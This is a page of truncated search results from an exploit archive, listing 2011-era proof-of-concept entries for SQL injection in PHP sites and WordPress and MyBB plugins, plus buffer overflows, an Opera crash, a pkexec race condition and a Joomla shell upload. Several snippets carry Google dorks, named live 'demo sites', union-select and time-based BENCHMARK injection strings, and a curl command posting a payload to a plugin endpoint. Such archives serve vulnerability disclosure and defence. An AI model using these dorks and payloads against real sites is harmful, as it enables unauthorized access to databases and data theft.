874 matches found
YSD Web Design SQL Injection
Exploit Title: Ysd Web Design Sql Injection Vulnerability Date: 20/11/2011 - 03:18 Author: 3spi0n Software Website: http://www.ysd.hk/ Tested On: BackTrack 5 - Win7 Ultimate Platform: Php $ Vulnerable File: Changer $ Dorks: "Designed by YSD" $ Demo Sites:...
Thunder Kankan Player 4.8.3.840 - Stack Overflow Denial of Service
Thunder Kankan Player 4.8.3.840 - Stack Overflow Denial of Service !/usr/bin/env python print """ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /\ /\ \ /\ /\ /\ \ /\ 0 0 /:/ / /::\ \ /:/ / /:/ / /::\ \ /:/ / 1 1 /:// /:/:\ \ /:/ / /:/ / /:/:\ \ /:// 0 0...
Webistry CMS 1.0 SQL Injection
Exploit Title : Webistry v1.0 CMS SQL Injection Vulnerability Author : CoBRa21 E-Mail : uykucu at windowslive.com Google Dork : Powered by CMS : Webistry v1.0 Script Page : null Exploit http://127.0.0.1/ PATH /index.php?pid=14' SQL http://127.0.0.1/ PATH /index.php?pid=14 union select...
Web File Browser 0.4b14 File Download Vulnerability
Exploit for php platform in category web applications Exploit Title: Web File Browser 0.4b14 File Download Vulnerability Date: 2011/11/03 Author: Sangyun YOO Email: yoosy0302 at naver dot com Software Link:...
Mevin Productions SQL Injection
Exploit Title: mevin productions Sql Injection Vulnerability Date: 30/10/2011 - 23:00 Author: 3spi0n Software Website: http://www.mevin.com/ Tested On: BackTrack 5 - Win7 Ultimate Platform: Php $ Vulnerable File: Event.php $ Dorks: "Powered by: mevin productions" inurl:/event.php?id= $ Demo Sites...
Art Dimension SQL Injection
Exploit Title: Art Dimension Sql Injection Vulnerability Date: 25.10.2011 - 01:03 Author: 3spi0n Software Website: http://www.artdimension.ca/ Tested On: BackTrack 5 - Win7 Ultimate Platform: Php $ Vulnerable File: Page.php / Pages.php $ Dorks: "Designed by Art Dimension" $ Demo Sites:...
Opera 11.51 - Use-After-Free Crash (PoC)
Opera 11.51 - Use-After-Free Crash PoC Exploit Title: Opera Use After Free - Crash PoC Date: 20 October 2011 Author: Roberto Suggi Liverani Software Link: www.opera.com Version: 11.51 and previous versions Tested on: Windows XP and Windows 7 CVE : n/a Link:...
Pre Studio Business Cards Designer - SQL Injection
Pre Studio Business Cards Designer - SQL Injection =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Exploit Title: Pre Studio Business Cards Designer SQL Injection Vulnerability =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Author: drzig Date: 20-10-2011 Softwar...
Joomla NoNumber Framework Local File Inclusion / Shell Upload
Exploit Title: NoNumber Framework Joomla! Plugin Multiple Vulnerabilities Discovery Date: 10 October 2011 Reported Date: 11 October 2011 Patch Date: 17 October 2011 Release Date: 17 October 2011 Author: jdc Software Link: http://nonumber.nl The nnframework plugin by NoNumber! contains multiple...
MyBB MyStatus 3.1 SQL Injection
--------------------------------------------------------------------- Exploit Title : MyBB MyStatus 3.1 --------------------------------------------------------------------- Author : MarioVs Date : 10/10/2011 Site : http://mariovs.pl/ @ : mariovsato2.pl...
MyBB Advanced Forum Signatures 2.0.4 SQL Injection
--------------------------------------------------------------------- Exploit Title : MyBB Advanced Forum Signatures afsignatures-2.0.4 --------------------------------------------------------------------- Author : MarioVs Date : 10/10/2011 Site : http://mariovs.pl/ @ : mariovsato2.pl...
MyBB Advanced Forum Signatures - 'afsignatures-2.0.4' SQL Injection
--------------------------------------------------------------------- Exploit Title : MyBB Advanced Forum Signatures afsignatures-2.0.4 --------------------------------------------------------------------- Author : MarioVs Date : 10/10/2011 Site : http://mariovs.pl/ @ : mariovsato2.pl...
Linux pkexec / polkitd 0.96 Race Condition
!/bin/sh pid; if stat procbuf, &statbuf != 0 gseterror error, POLKITERROR, POLKITERRORFAILED, "stat failed for /proc/%d: %s", process-pid, gstrerror errno; goto out; where the code only rely on stat of the pseudo filesystem src/polkit/polkitsubject.c --------- there's not enough validation to run...
LightNEasy 3.4.2 Multiple Vulnerabilities
Exploit for php platform in category web applications ========================================================================= LightNEasy 3.4.2 Multiple Vulnerabilities =========================================================================...
JlWeb SQL Injection
Exploit Title: JlWeb Sql Injection Vulnerability Date: 18/09/2011 06:21 Author: 3spi0n Software Link: http://www.jl-web.de/ Tested On: BackTrack 5 - Win7 Ultimate Platform: Php $ Dorks: "Design by JL Web" $ Demo Sites: http://www.sbybikes.be/lire/index.php?rubid=11" PhpSQLi As Close As A Breath...
WordPress Auctions 1.8.8 SQL Injection
Exploit Title: WordPress Auctions plugin @AlligatorTeam Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip Version: 1.8.8 tested --------------- PoC --------------- URL:...
Aika 0.2 - colladaconverter Xml Parsing Buffer Overflow
/ ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// Exploit Title: Aika colladaconverter buffer overflow exploit Date: 09/11/2011 Author: isciurus Software Link: http://aika.googlecode.com/files/aika-v02.zip Version: 0.2 Tested...
WordPress Paid Downloads 2.01 SQL Injection
Exploit Title: WordPress Paid Downloads plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $downloadkey = $GET"downloadkey"; $sql = "SELECT FROM ".$wpdb-prefix."pddownloadlinks WHERE downloadkey = '".$downloadkey."'"; $linkdetails =...
WordPress SCORM Cloud 1.0.6.6 SQL Injection
Exploit Title: WordPress SCORM Cloud plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 e.g.: curl --data "action=addAnonRegGetLaunchUrl&inviteid=-1' AND 1=IF21,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0-- " http://www.site.com/wp-content/plugins/scormcloud/ajax.php...
WordPress SearchAutocomplete 1.0.8 SQL Injection
Exploit Title: WordPress SearchAutocomplete plugin getresults"SELECT posttitle As name, ID as postid, guid AS url, 1 cnt FROM ".$wpdb-prefix."posts t WHERE poststatus='publish' and posttype='post' OR posttype='page' and postdate NOW and posttitle LIKE '%".$GET'term'."%' ORDER BY posttitle";...